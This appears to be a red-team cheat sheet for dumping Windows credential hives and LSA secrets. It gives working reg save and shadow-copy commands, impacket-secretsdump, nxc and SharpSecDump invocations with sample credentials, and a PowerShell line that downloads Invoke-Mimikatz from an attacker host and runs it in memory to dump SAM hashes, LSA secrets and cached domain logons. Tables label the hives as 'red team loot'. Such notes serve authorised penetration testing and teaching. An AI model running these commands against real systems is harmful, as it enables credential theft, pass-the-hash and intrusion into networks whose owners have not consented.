Resources
- General
- Evasion
- Orange Cyberdefense, "Dumping LSA secrets: a story about task decorrelation" (evading detection of the dump): https://www.orangecyberdefense.com/no/blog/cybersecurity/dumping-lsa-secrets-a-story-about-task-decorrelation
- Changing the machine account password with ksetup: https://pentest.party/posts/2025/ksetup-machine-password/
Cheat sheet
Commands
- Windows
- LOL (living off the land: built-in binaries only)
- Reg.exe
Dump the three hives from an elevated shell (needs SeBackupPrivilege, see Permissions below), then parse them offline with Impacket in LOCAL mode:

```cmd
reg save hklm\system system.hive
reg save hklm\sam sam.hive
reg save hklm\security security.hive
```

```bash
impacket-secretsdump -system system.hive -security security.hive -sam sam.hive -history LOCAL
```

- Vssadmin

The hive files under System32\config are locked while Windows runs, so a plain copy fails. Create a volume shadow copy and copy the files out of it instead (the original notes this works from cmd.exe; run it elevated):

```cmd
:: works from an elevated cmd.exe
wmic shadowcopy call create Volume='C:\'
vssadmin list shadows
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\sam sam.hive
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\security security.hive
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\system system.hive
```

Replace HarddiskVolumeShadowCopy1 with the shadow copy number shown by `vssadmin list shadows`. `vssadmin create shadow` only exists on Windows Server editions, which is why wmic is used on workstations; note that wmic is deprecated in current Windows 11 builds, so check it is still present on the target.
- Tools
- Mimikatz
```powershell
# Load Invoke-Mimikatz in memory from the attacker host (192.168.99.23 in these notes)
IEX (New-Object Net.WebClient).DownloadString('http://192.168.99.23/PowerShell/Invoke-Mimikatz.ps1')
# Enable SeDebugPrivilege, impersonate SYSTEM, log to out.txt, then dump SAM hashes, LSA secrets and cached domain logons
Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "log out.txt" "lsadump::sam" "lsadump::secrets" "lsadump::cache" "exit"'
```
- SharpSecDump
```powershell
# Compiled binary
.\SharpSecDump.exe -d=redteamrecipes.com -u=administrator -p=Password123#a -target='192.168.99.25'
# PowerSharpPack in-memory wrapper
Invoke-SharpSecDump -Command "-d=redteamrecipes.com -u=administrator -p=Password123#a -target=192.168.99.25"
```

SharpSecDump is a .NET port of secretsdump's remote SAM and LSA dumping: it authenticates over SMB (ADMIN$ and IPC$), reaches the Remote Registry service over RPC, reads the SAM, SECURITY and SYSTEM data remotely, then decrypts and prints the hashes and secrets.
- Linux
- nxc
```bash
# --sam dumps local account hashes, --lsa dumps LSA secrets and cached domain logons (DCC2)
nxc smb 192.168.99.10 -u fmoheb -p 'Password123#f' --sam --lsa
```

- Impacket

```bash
impacket-secretsdump 'redteamrecipes.com/administrator:Password123#a@192.168.99.25' -pwd-last-set -user-status -history
```

`-history` also dumps SAM password history and old LSA secret values; `-pwd-last-set` and `-user-status` only affect NTDS output, so they are harmless but unused against a non-DC target.
- Tricks
- Check services
Remote dumping (secretsdump, nxc, SharpSecDump) relies on the Remote Registry service. Query its state from Linux:

```bash
impacket-services 'redteamrecipes.com/administrator:Password123#a@192.168.99.25' status -name RemoteRegistry
```

Or on the host itself:

```powershell
Get-Service RemoteRegistry
Start-Service RemoteRegistry
Stop-Service RemoteRegistry -Force
```

impacket-secretsdump starts a stopped RemoteRegistry service by itself and stops it again when it finishes; the commands above are the manual equivalent for checking beforehand and cleaning up afterwards.
Tools
- SharpSecDump : https://github.com/G0ldenGunSec/SharpSecDump/ || https://github.com/S3cur3Th1sSh1t/PowerSharpPack/blob/master/PowerSharpBinaries/Invoke-SharpSecDump.ps1
- Invoke-Mimikatz : https://github.com/PowershellMafia/Powersploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1
Notes
Permissions
- `reg save` (RegSaveKey) needs SeBackupPrivilege (Back up files and directories) in the calling token to dump the SAM, SYSTEM and SECURITY hives. By default only two groups hold it:
- Administrators (most common; in an interactive session the shell must be elevated, since UAC strips the privilege from the filtered token)
- Backup Operators (a "lower" privileged group often targeted by red teamers because it can still dump the hives)
- Check with:

```cmd
whoami /priv
```

SeBackupPrivilege is normally shown as Disabled; that is fine, reg.exe enables it for itself. If it is missing from the list entirely, `reg save hklm\sam` fails with access denied.
Windows Registry Hives: The Holy Trinity

A comparison of the three hives required for offline credential dumping.

| Feature | SAM (Security Accounts Manager) | SECURITY (LSA & cache) | SYSTEM (configuration & keys) |
|---|---|---|---|
| Primary role | The database for local users. | The vault for system and domain secrets. | The master key holder. |
| What it stores | Local user NTLM hashes; local groups; user RIDs (e.g. the built-in Administrator is RID 500). | Cached domain logons (DCC2/MSCASH2); LSA secrets (service account passwords); the machine account password ($MACHINE.ACC). | The boot key (SysKey) in obfuscated form; system configuration and drivers. |
| Encryption | Hashes encrypted with keys derived from the boot key. | Secrets encrypted with keys derived from the boot key. | Holds the obfuscated class names from which the boot key is rebuilt. |
| Dependency | Cannot be decrypted without SYSTEM. | Cannot be decrypted without SYSTEM. | Required to unlock the other two. |
| Red team loot | Local admin access (pass-the-hash with the NT hash). | Cached domain user hashes (offline cracking only; DCC2 cannot be passed) and service passwords. | Ability to decrypt the SAM and SECURITY hives. |
| Registry path | HKLM\SAM | HKLM\SECURITY | HKLM\SYSTEM |
| File path | C:\Windows\System32\config\SAM | C:\Windows\System32\config\SECURITY | C:\Windows\System32\config\SYSTEM |
Windows Auth: The Bank Analogy

A breakdown of the Windows security architecture components.

| Acronym | Type | Role (the analogy) | Technical function | Red team goal |
|---|---|---|---|---|
| LSA | Concept / subsystem | The rulebook | The Local Security Authority: defines and enforces the local security policy. | N/A on its own; its secrets live in the SECURITY hive and in LSASS memory. |
| LSASS | Process | The guard | The process that verifies credentials and holds keys and credentials in memory. | Dump its memory (Mimikatz sekurlsa, a process dump) to steal everything in RAM. |
| SAM | Hive file | Local notebook | Database of local user NTLM hashes. | Steal to pass or crack local admin hashes. |
| SECURITY | Hive file | Deposit box | Database of cached domain logons (DCC2) and LSA secrets. | Steal to crack domain user passwords (DCC2) and read LSA secrets (service passwords). |
| SYSTEM | Hive file | The master key | Holds the boot key (SysKey) that unlocks the other two hives. | Steal to decrypt the SAM and SECURITY hives. |